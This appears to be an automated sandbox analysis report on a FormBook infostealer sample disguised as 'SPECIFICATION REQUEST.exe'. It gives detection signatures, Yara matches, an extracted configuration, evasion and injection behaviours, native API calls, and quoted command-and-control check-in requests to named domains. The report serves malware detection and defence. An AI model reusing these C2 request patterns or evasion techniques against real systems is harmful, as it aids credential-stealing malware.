Analysis Report SPECIFICATION REQUEST.exe

Overview

General Information

Sample Name:	SPECIFICATION REQUEST.exe
Analysis ID:	344818
MD5:	e7d7f8b02dd023f31b46e5bb265c7224
SHA1:	95e91ec34debdc0e4817d90caca87897f4febe98
SHA256:	fc534d33f183a321a447fef1fdef4c8a7fa78413cd15f93df13a39f0a8b9b2fe
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM_3

Yara detected FormBook

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Signatures

AV Detection:

Found malware configuration

Source: 2.2.SPECIFICATION REQUEST.exe.400000.0.unpack

Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc2", "KEY1_OFFSET 0x1d51a", "CONFIG SIZE : 0xe5", "CONFIG OFFSET 0x1d61a", "URL SIZE : 30", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xe7084a1f", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715050", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012100", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01571", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.603741374.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.605460849.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.234997361.00000000039B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.275652340.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.276091208.0000000001030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.276039902.0000000000FF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.604735296.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.SPECIFICATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.SPECIFICATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Source: SPECIFICATION REQUEST.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 2.2.SPECIFICATION REQUEST.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Source: SPECIFICATION REQUEST.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: SPECIFICATION REQUEST.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Source:	Binary string: wntdll.pdbUGP source: SPECIFICATION REQUEST.exe, 00000002.00000002.276237746.00000000010E0000.00000040.00000001.sdmp, wlanext.exe, 00000005.00000003.275791125.0000000000C70000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: SPECIFICATION REQUEST.exe, wlanext.exe
Source:	Binary string: wlanext.pdb source: SPECIFICATION REQUEST.exe, 00000002.00000002.276177204.0000000001090000.00000040.00000001.sdmp
Source:	Binary string: wlanext.pdbGCTL source: SPECIFICATION REQUEST.exe, 00000002.00000002.276177204.0000000001090000.00000040.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 4x nop then pop esi	2_2_004172EC
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 4x nop then pop edi	2_2_0040E450
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 4x nop then pop esi	5_2_005C72EC
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 4x nop then pop edi	5_2_005BE450

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49735 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49735 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49735 -> 34.102.136.180:80

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /gbr/?ExlPdj=nhAt8Z8LHJDSJ38oPYfO+brGMc7hoePPt0UT7/rkXoSmXfJRpMQb8gX/3j1aoGmg1yg5&8p=FjoPdvK0HvW0 HTTP/1.1Host: www.toprestau.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gbr/?8p=FjoPdvK0HvW0&ExlPdj=Iv22WWjBKqQBYt0GN1Q3exOP7ZZ1MpJKXobvjkOcU9p13P0mNXwz/8InMIRVOTv7wUKT HTTP/1.1Host: www.bistrolartichaut.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gbr/?ExlPdj=9T+hwsCOJ30KUotVp56F2oUIcU+kzNAqslJ8t+71ysezeCdq1RydECu9CMdgx5D0Nzh8&8p=FjoPdvK0HvW0 HTTP/1.1Host: www.firstbyphone.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 34.102.136.180 34.102.136.180

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CSLDE CSLDE
Source: Joe Sandbox View	ASN Name: GOOGLEUS GOOGLEUS

Source: C:\Windows\explorer.exe

Code function: 3_2_06D26782 getaddrinfo,setsockopt,recv,

3_2_06D26782

Source: global traffic	HTTP traffic detected: GET /gbr/?ExlPdj=nhAt8Z8LHJDSJ38oPYfO+brGMc7hoePPt0UT7/rkXoSmXfJRpMQb8gX/3j1aoGmg1yg5&8p=FjoPdvK0HvW0 HTTP/1.1Host: www.toprestau.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gbr/?8p=FjoPdvK0HvW0&ExlPdj=Iv22WWjBKqQBYt0GN1Q3exOP7ZZ1MpJKXobvjkOcU9p13P0mNXwz/8InMIRVOTv7wUKT HTTP/1.1Host: www.bistrolartichaut.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gbr/?ExlPdj=9T+hwsCOJ30KUotVp56F2oUIcU+kzNAqslJ8t+71ysezeCdq1RydECu9CMdgx5D0Nzh8&8p=FjoPdvK0HvW0 HTTP/1.1Host: www.firstbyphone.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.planterboxgardener.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Joker.com HTTP Parking ServerDate: Wed, 27 Jan 2021 07:00:10 GMTLast-Modified: Wed, 27 Jan 2021 07:00:10 GMTCache-Control: no-store, no-cache, must-revalidate, post-check= 0, pre-check=0, max-age=3600Expires: Fri, 01 Jan 2016 00:00:00 GMTContent-Length: 1840Connection: Close

Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: SPECIFICATION REQUEST.exe, 00000000.00000002.234532898.00000000029B1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.260000317.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.603741374.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.605460849.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.234997361.00000000039B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.275652340.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.276091208.0000000001030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.276039902.0000000000FF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.604735296.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.SPECIFICATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.SPECIFICATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000005.00000002.603741374.00000000005B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.603741374.00000000005B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.605460849.0000000000D70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.605460849.0000000000D70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.234997361.00000000039B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.234997361.00000000039B1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.275652340.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.275652340.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.276091208.0000000001030000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.276091208.0000000001030000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.276039902.0000000000FF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.276039902.0000000000FF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.604735296.0000000000C20000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.604735296.0000000000C20000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.SPECIFICATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.SPECIFICATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.SPECIFICATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.SPECIFICATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Contains functionality to call native functions

Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_00419D60 NtCreateFile,	2_2_00419D60
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_00419E10 NtReadFile,	2_2_00419E10
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_00419E90 NtClose,	2_2_00419E90
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_00419F40 NtAllocateVirtualMemory,	2_2_00419F40
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_00419D5A NtCreateFile,	2_2_00419D5A
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_00419E0B NtReadFile,	2_2_00419E0B
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01149910 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_01149910
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011499A0 NtCreateSection,LdrInitializeThunk,	2_2_011499A0
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01149840 NtDelayExecution,LdrInitializeThunk,	2_2_01149840
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01149860 NtQuerySystemInformation,LdrInitializeThunk,	2_2_01149860
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011498F0 NtReadVirtualMemory,LdrInitializeThunk,	2_2_011498F0
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01149A00 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_01149A00
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01149A20 NtResumeThread,LdrInitializeThunk,	2_2_01149A20
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01149A50 NtCreateFile,LdrInitializeThunk,	2_2_01149A50
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01149540 NtReadFile,LdrInitializeThunk,	2_2_01149540
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011495D0 NtClose,LdrInitializeThunk,	2_2_011495D0
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01149710 NtQueryInformationToken,LdrInitializeThunk,	2_2_01149710
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01149780 NtMapViewOfSection,LdrInitializeThunk,	2_2_01149780
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011497A0 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_011497A0
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01149660 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_01149660
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011496E0 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_011496E0
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01149950 NtQueueApcThread,	2_2_01149950
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011499D0 NtCreateProcessEx,	2_2_011499D0
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01149820 NtEnumerateKey,	2_2_01149820
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_0114B040 NtSuspendThread,	2_2_0114B040
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011498A0 NtWriteVirtualMemory,	2_2_011498A0
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01149B00 NtSetValueKey,	2_2_01149B00
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_0114A3B0 NtGetContextThread,	2_2_0114A3B0
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01149A10 NtQuerySection,	2_2_01149A10
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01149A80 NtOpenDirectoryObject,	2_2_01149A80
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_0114AD30 NtSetContextThread,	2_2_0114AD30
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01149520 NtWaitForSingleObject,	2_2_01149520
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01149560 NtWriteFile,	2_2_01149560
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011495F0 NtQueryInformationFile,	2_2_011495F0
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_0114A710 NtOpenProcessToken,	2_2_0114A710
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01149730 NtQueryVirtualMemory,	2_2_01149730
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_0114A770 NtOpenThread,	2_2_0114A770
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01149770 NtSetInformationFile,	2_2_01149770
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01149760 NtOpenProcess,	2_2_01149760
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01149FE0 NtCreateMutant,	2_2_01149FE0
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01149610 NtEnumerateValueKey,	2_2_01149610
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01149650 NtQueryValueKey,	2_2_01149650
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_01149670 NtQueryInformationProcess,	2_2_01149670
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Code function: 2_2_011496D0 NtCreateKey,	2_2_011496D0
Source: C:\Windows\explorer.exe	Code function: 3_2_06D25A32 NtCreateFile,	3_2_06D25A32
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03309A50 NtCreateFile,LdrInitializeThunk,	5_2_03309A50
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03309910 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_03309910
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_033099A0 NtCreateSection,LdrInitializeThunk,	5_2_033099A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03309860 NtQuerySystemInformation,LdrInitializeThunk,	5_2_03309860
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03309840 NtDelayExecution,LdrInitializeThunk,	5_2_03309840
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03309710 NtQueryInformationToken,LdrInitializeThunk,	5_2_03309710
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03309780 NtMapViewOfSection,LdrInitializeThunk,	5_2_03309780
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03309FE0 NtCreateMutant,LdrInitializeThunk,	5_2_03309FE0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03309660 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_03309660
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03309650 NtQueryValueKey,LdrInitializeThunk,	5_2_03309650
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_033096E0 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_033096E0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_033096D0 NtCreateKey,LdrInitializeThunk,	5_2_033096D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03309540 NtReadFile,LdrInitializeThunk,	5_2_03309540
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_033095D0 NtClose,LdrInitializeThunk,	5_2_033095D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03309B00 NtSetValueKey,	5_2_03309B00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_0330A3B0 NtGetContextThread,	5_2_0330A3B0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03309A20 NtResumeThread,	5_2_03309A20
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03309A10 NtQuerySection,	5_2_03309A10
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03309A00 NtProtectVirtualMemory,	5_2_03309A00
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03309A80 NtOpenDirectoryObject,	5_2_03309A80
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03309950 NtQueueApcThread,	5_2_03309950
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_033099D0 NtCreateProcessEx,	5_2_033099D0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03309820 NtEnumerateKey,	5_2_03309820
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_0330B040 NtSuspendThread,	5_2_0330B040
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_033098A0 NtWriteVirtualMemory,	5_2_033098A0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_033098F0 NtReadVirtualMemory,	5_2_033098F0
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03309730 NtQueryVirtualMemory,	5_2_03309730
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_0330A710 NtOpenProcessToken,	5_2_0330A710
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_0330A770 NtOpenThread,	5_2_0330A770
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 5_2_03309770 NtSetInformationFile,	5_2_03309770
